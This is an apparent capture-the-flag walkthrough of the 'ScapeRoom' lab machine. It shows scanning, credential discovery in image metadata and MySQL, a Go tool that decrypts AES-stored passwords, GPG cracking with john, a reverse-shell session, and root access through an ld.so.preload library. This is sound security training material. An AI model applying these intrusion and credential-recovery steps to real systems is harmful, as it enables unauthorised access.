TheHackersLabs-ScapeRoom-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.162 08:00:27:07:8f:0e PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f9:b3:de VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.071 seconds (123.61 hosts/sec). 4 responded
export ip=192.168.60.162
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.162:22
Open 192.168.60.162:80
Open 192.168.60.162:3306
Open 192.168.60.162:33060
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 17:10 CST
Initiating ARP Ping Scan at 17:10
Scanning 192.168.60.162 [1 port]
Completed ARP Ping Scan at 17:10, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:10
Completed Parallel DNS resolution of 1 host. at 17:10, 0.25s elapsed
DNS resolution of 1 IPs took 0.25s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:10
Scanning 192.168.60.162 [4 ports]
Discovered open port 80/tcp on 192.168.60.162
Discovered open port 22/tcp on 192.168.60.162
Discovered open port 33060/tcp on 192.168.60.162
Discovered open port 3306/tcp on 192.168.60.162
Completed SYN Stealth Scan at 17:10, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.162
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-24 17:10:38 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3306/tcp open mysql syn-ack ttl 64
33060/tcp open mysqlx syn-ack ttl 64
MAC Address: 08:00:27:07:8F:0E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Browsing to port 80 shows a probe-like service (a sensor-readings dashboard).

[screenshot]

Directory scanning

If you look at the page source, there is a piece of ciphertext hidden in it.

❯ curl http://$ip/
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Lecturas de Sensores</title>
<link rel="stylesheet" href="css/style.css">
<!-- QSB2ZWNlcywgbG8gbcOhcyBvYnZpbyBlcyBsbyBxdWUgc2UgcGFzYSBwb3IgYWx0by4gVHUgw7puaWNhIHNhbGlkYSBlcyB2ZXIgbG8gcXVlIG90cm9zIG5vIHZlbi4gRWwgdGllbXBvIGNvcnJlIHkgY2FkYSBwaXN0YSBlcyB1bmEgcGllemEgY2xhdmUgZGVsIHJvbXBlY2FiZXphcy4K -->

[screenshot]

It gives a hint.

[screenshot]

Anyway, I also scanned for directories.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/administracion (Status: 301) [Size: 325] [--> http://192.168.60.162/administracion/]
/css (Status: 301) [Size: 314] [--> http://192.168.60.162/css/]
/index.php (Status: 200) [Size: 4271]
/index.php (Status: 200) [Size: 4271]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

Visiting /administracion returns 403 Forbidden.

Scan again under this directory.

There is a login page.

❯ gobuster dir -u http://$ip/administracion -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.162/administracion
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 2714]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

After trying weak credentials on the login page, I noticed a small hint hidden in the response.

It gives a domain and a subdomain:

sensores.thl info.sensores.thl

[screenshot]

Hidden data in the image

On the info subdomain there is an extra image.

[screenshot]

Download it with wget.

The image's comment field contains a base64-encoded string.

❯ wget http://info.sensores.thl/images/sensor_overview.png
--2025-01-24 20:34:10-- http://info.sensores.thl/images/sensor_overview.png
Resolving info.sensores.thl (info.sensores.thl)... 192.168.60.162
Connecting to info.sensores.thl (info.sensores.thl)|192.168.60.162|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1930599 (1.8M) [image/png]
Saving to: ‘sensor_overview.png’

sensor_overview.pn 100%[==============>] 1.84M --.-KB/s in 0.06s

2025-01-24 20:34:10 (31.8 MB/s) - ‘sensor_overview.png’ saved [1930599/1930599]

❯ exiftool sensor_overview.png
ExifTool Version Number : 13.00
File Name : sensor_overview.png
Directory : .
File Size : 1931 kB
File Modification Date/Time : 2024:11:04 01:02:04+08:00
File Access Date/Time : 2025:01:24 20:34:10+08:00
File Inode Change Date/Time : 2025:01:24 20:34:10+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1147
Image Height : 1147
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Comment : YWN1dGU6SVM0eUJ2Znd4cFhVWnNCeGhDWHI1bXV2M2RYZFFnIQo=
Image Size : 1147x1147
Megapixels : 1.3
echo "YWN1dGU6SVM0eUJ2Znd4cFhVWnNCeGhDWHI1bXV2M2RYZFFnIQo="|base64 -d
acute:IS4yBvfwxpXUZsBxhCXr5muv3dXdQg!

We have a credential; try logging in again.

[screenshot]

Well, that doesn't work, but the box has port 3306 open.

MySQL events

Try these credentials on MySQL.

❯ mysql -h 192.168.60.162 -u acute -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 39
Server version: 8.0.40-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| SensorData |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.010 sec)

MySQL [(none)]> use SensorData
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [SensorData]> show tables;
+------------------------+
| Tables_in_SensorData |
+------------------------+
| login |
| sensor_readings |
| sensor_readings_backup |
+------------------------+
3 rows in set (0.002 sec)

MySQL [SensorData]> select * from login;
+----+---------------+------------------------------------------------------------------+
| id | usuario | password |
+----+---------------+------------------------------------------------------------------+
| 1 | administrador | BD9D09C524BC8A234E0B75D4FA60AF8A71D124915A3D44BC17B761186D0EB00E |
+----+---------------+------------------------------------------------------------------+
1 row in set (0.001 sec)

We got a credential, but the password is clearly encrypted.

Recall that this database holds the environmental data shown on the web page earlier, and that data is updated periodically.

So there may be scheduled events in the database.

Let's list all the events.

MySQL [SensorData]> show events from SensorData;
+------------+--------------------+----------------+-----------+-----------+------------+----------------+----------------+---------------------+------+---------+------------+----------------------+----------------------+--------------------+
| Db | Name | Definer | Time zone | Type | Execute at | Interval value | Interval field | Starts | Ends | Status | Originator | character_set_client | collation_connection | Database Collation |
+------------+--------------------+----------------+-----------+-----------+------------+----------------+----------------+---------------------+------+---------+------------+----------------------+----------------------+--------------------+
| SensorData | insert_login_data | acute@% | SYSTEM | RECURRING | NULL | 1 | MINUTE | 2024-11-02 22:46:13 | NULL | ENABLED | 1 | utf8mb3 | utf8mb3_general_ci | utf8mb4_0900_ai_ci |
| SensorData | sensor_data_update | root@localhost | SYSTEM | RECURRING | NULL | 1 | MINUTE | 2024-11-01 18:02:42 | NULL | ENABLED | 1 | utf8mb4 | utf8mb4_0900_ai_ci | utf8mb4_0900_ai_ci |
+------------+--------------------+----------------+-----------+-----------+------------+----------------+----------------+---------------------+------+---------+------------+----------------------+----------------------+--------------------+
2 rows in set (0.005 sec)

Sure enough, there is an event for login.

Query the event definition.

It runs every minute: it generates a random 16-character password, AES-encrypts it with the key 'encryption_key', and stores the result as hex.

MySQL [SensorData]> SHOW CREATE EVENT insert_login_data;
+-------------------+-----------------------------------------------------------------------------------------------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------+--------------------+
| Event | sql_mode | time_zone | Create Event | character_set_client | collation_connection | Database Collation |
+-------------------+-----------------------------------------------------------------------------------------------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------+--------------------+
| insert_login_data | ONLY_FULL_GROUP_BY,STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_ENGINE_SUBSTITUTION | SYSTEM | CREATE DEFINER=`acute`@`%` EVENT `insert_login_data` ON SCHEDULE EVERY 1 MINUTE STARTS '2024-11-02 22:46:13' ON COMPLETION NOT PRESERVE ENABLE DO BEGIN

IF (SELECT COUNT(*) FROM login) = 0 THEN
SET @password_plain = SUBSTRING(MD5(RAND()), 1, 16);
INSERT INTO login (usuario, password)
VALUES ('administrador', HEX(AES_ENCRYPT(@password_plain, 'encryption_key')));
END IF;
END | utf8mb3 | utf8mb3_general_ci | utf8mb4_0900_ai_ci |
+-------------------+-----------------------------------------------------------------------------------------------------------------------+-----------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------+--------------------+
1 row in set (0.001 sec)

So let's try decrypting it in MySQL.

MySQL [SensorData]> select * from login
-> ;
+----+---------------+------------------------------------------------------------------+
| id | usuario | password |
+----+---------------+------------------------------------------------------------------+
| 1 | administrador | BD9D09C524BC8A234E0B75D4FA60AF8A71D124915A3D44BC17B761186D0EB00E |
+----+---------------+------------------------------------------------------------------+
1 row in set (0.001 sec)

MySQL [SensorData]> SELECT CONVERT(AES_DECRYPT(UNHEX(password), 'encryption_key') USING utf8)
-> AS decrypted_password FROM login WHERE usuario = 'administrador';
+--------------------+
| decrypted_password |
+--------------------+
| e381025ee5804e9a |
+--------------------+
1 row in set, 1 warning (0.001 sec)
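
As an added example (not from the original write-up), here is a Go program that reproduces what MySQL's AES_ENCRYPT/AES_DECRYPT do in the default aes-128-ecb mode (the key string XOR-folded into 16 bytes, PKCS#7 padding), so the value the insert_login_data event stored can be checked offline. It uses the ciphertext and the 'encryption_key' literal shown above and assumes the server was running with the default block_encryption_mode.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"fmt"
)

// Stored HEX(AES_ENCRYPT(...)) value from the login table shown in the write-up.
const storedHex = "BD9D09C524BC8A234E0B75D4FA60AF8A71D124915A3D44BC17B761186D0EB00E"

// mysqlCipher builds the AES-128 block cipher the way MySQL does in aes-128-ecb mode:
// every byte of the key string is XORed into position i mod 16 of a zeroed 16-byte key.
func mysqlCipher(key string) cipher.Block {
	folded := make([]byte, aes.BlockSize)
	for i := 0; i < len(key); i++ {
		folded[i%aes.BlockSize] ^= key[i]
	}
	block, _ := aes.NewCipher(folded) // folded is always 16 bytes, so this cannot fail
	return block
}

// EncryptHex mimics HEX(AES_ENCRYPT(plain, key)): PKCS#7 padding, AES-128-ECB, uppercase hex.
func EncryptHex(plain, key string) string {
	block := mysqlCipher(key)
	pad := aes.BlockSize - len(plain)%aes.BlockSize
	buf := append([]byte(plain), bytes.Repeat([]byte{byte(pad)}, pad)...)
	for i := 0; i < len(buf); i += aes.BlockSize {
		block.Encrypt(buf[i:i+aes.BlockSize], buf[i:i+aes.BlockSize]) // ECB: each block on its own
	}
	return fmt.Sprintf("%X", buf)
}

// DecryptHex mimics AES_DECRYPT(UNHEX(hexCipher), key). MySQL returns NULL when the
// key is wrong because the padding check fails; here that surfaces as an error.
func DecryptHex(hexCipher, key string) (string, error) {
	ct, err := hex.DecodeString(hexCipher)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext is not valid hex of whole AES blocks: %v", err)
	}
	block := mysqlCipher(key)
	for i := 0; i < len(ct); i += aes.BlockSize {
		block.Decrypt(ct[i:i+aes.BlockSize], ct[i:i+aes.BlockSize])
	}
	pad := int(ct[len(ct)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(ct[len(ct)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", fmt.Errorf("bad padding: wrong key or corrupted ciphertext")
	}
	return string(ct[:len(ct)-pad]), nil
}

func main() {
	// 'encryption_key' is the key literal visible in SHOW CREATE EVENT insert_login_data.
	pw, err := DecryptHex(storedHex, "encryption_key")
	fmt.Println("decrypted:", pw, err)
	fmt.Println("re-encrypt matches stored value:", EncryptHex(pw, "encryption_key") == storedHex)
}
```

The defender's takeaway: any account allowed to run SHOW CREATE EVENT can read the key and recover every stored password this way, which is why reversible encryption with the key kept next to the data is no substitute for salted password hashing.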

Logging in gives us a new user.

[screenshot]

At this point I got stuck: SSH login didn't work.

Later, from other people's write-ups, I learned that SSH for this user is restricted to connections from the 10.x network.

#cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
ListenAddress 0.0.0.0
AllowUsers [email protected]/24 [email protected]/24
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server

So that's why the download instructions for this box tell you to add an extra NAT adapter.

But my Kali can't bridge into VirtualBox's NAT network.

With no alternative, I logged in directly on the target VM's console.

[screenshot]

Then I sent a reverse shell from the target back to Kali. The keyboard layout on this box is different, so typing a slash was a real struggle; it took many tries.

Eventually I just switched to the Spanish on-screen keyboard.

[screenshot]

User privilege escalation

❯ pwncat-cs -lp 4444
[21:35:44] Welcome to pwncat 🐈! __main__.py:164
[21:43:21] received connection from 192.168.60.162:47400 bind.py:84
[21:43:22] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
192.168.60.162:47400: registered new host w/ db manager.py:957
(local) pwncat$
(remote) pepito@ctf:/home/pepito$ ls
leeme.txt.gpg user.txt
(remote) pepito@ctf:/home/pepito$ cat user.txt
qW1eR2tY3uIoP4aS5dF6gH7jK8lZxCvBnMp
(local) pwncat$ download leeme.txt.gpg
leeme.txt.gpg ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 225/225 bytes • ? • 0:00:00
[21:45:23] downloaded 225.00B in 0.17 seconds

There is a GPG file in the user's home directory; download it and crack it locally.

The password is superman1.

❯ gpg2john leeme.txt.gpg >hash

File leeme.txt.gpg
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
superman1 (?)
1g 0:00:00:16 DONE (2025-01-24 21:46) 0.05959g/s 66.74p/s 66.74c/s 66.74C/s superman1..hamster
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Root privilege escalation

Decrypting the GPG file gives another hint.

❯ gpg --decrypt leeme.txt.gpg
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
No todas las funciones tienen el control que parecen tener. Algunas veces, quien controla lo que se **carga primero** tiene la ventaja. Recuerda: la pre-carga puede ser tu mejor aliada... o tu perdición.
Not all functions have the control they seem to have. Sometimes, whoever controls what is **loaded first** has the advantage. Remember: preloading can be your best ally... or your downfall.

What is preloading?

On Linux, preloading is a technique for speeding up program startup: a preloader is a user-space program that loads the shared libraries a program needs before the program starts, reducing startup latency. In the dynamic linker's sense, which is what matters here, any library listed in /etc/ld.so.preload (or in LD_PRELOAD) is loaded into every dynamically linked process before its normal dependencies, so its symbols take precedence over the same-named functions in libc and other libraries.

You can list a binary's shared-library dependencies with ldd.

For example, the dependencies of ls:

(remote) pepito@ctf:/home/pepito$ ldd /bin/ls
linux-vdso.so.1 (0x00007ffd01954000)
/lib/libscaperoom.so (0x00007fc705f00000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fc705ecd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc705cdb000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fc705cd5000)
libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007fc705c44000)
/lib64/ld-linux-x86-64.so.2 (0x00007fc705f2c000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fc705c21000)
-------------- separator --------------
Dependencies on my local Kali, for comparison:
❯ ldd /bin/ls
linux-vdso.so.1 (0x00007ffff698a000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f48f9619000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48f9423000)
libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f48f9381000)
/lib64/ld-linux-x86-64.so.2 (0x00007f48f968c000)

Clearly /lib/libscaperoom.so is out of place.

Let's look at the preload configuration file.

This confirms that the library is being preloaded.

(remote) pepito@ctf:/home/pepito$ cat /etc/ld.so.preload
/lib/libscaperoom.so

Dump the library's .rodata section, which generally holds constant strings and other read-only data.

Among them is the password that su accepts for switching to root.

(remote) pepito@ctf:/home/pepito$ readelf -p .rodata /lib/libscaperoom.so

String dump of section '.rodata':
[ 0] read
[ 5] /proc/%d/comm
[ 13] r
[ 15] su^J
[ 19] rT8hQ9VcYb5kLmXo
[ 2b] [+] Acceso root concedido!
[ 48] [+] Reloj detenido... Buen trabajo!!!
[ 70] /bin/systemctl stop apagar_automatico.service
[ 9e] /bin/bash

Try switching user.

Sure enough, we're in.

(remote) pepito@ctf:/home/pepito$ su root
Password:
[+] Acceso root concedido!
[+] Reloj detenido... Buen trabajo!!!
(remote) root@ctf:/home/pepito# cat /root/root.txt
==================================================
¡ENHORABUENA, INTRÉPIDO HACKER!

Has logrado superar todos los desafíos y escapar de esta sala virtual. El tiempo no fue tu enemigo,
sino tu aliado, y cada decisión te ha llevado hasta este momento.

La clave para tu victoria es:

AaSdF8gHjKlZxCvB6nM7OoPqW1eR2tY3uIoP

Esta flag es el símbolo de tu éxito y la prueba de que has alcanzado el nivel más alto de este reto.
Guarda este logro con orgullo, pues no todos pueden llegar tan lejos.

Recuerda:
- Cada pista que descifraste fue una lección valiosa.
- Cada error que cometiste, una oportunidad de crecer.
- Cada éxito, un paso más hacia el dominio.

Esto no es el final, sino el comienzo de nuevos desafíos. ¿Estás preparado para lo que viene?

¡Nos vemos en el próximo reto, donde tu ingenio será puesto a prueba una vez más!

==================================================

This box was a bit of a struggle, with plenty of bumps along the way, and in the end I still had to consult other people's write-ups 😥
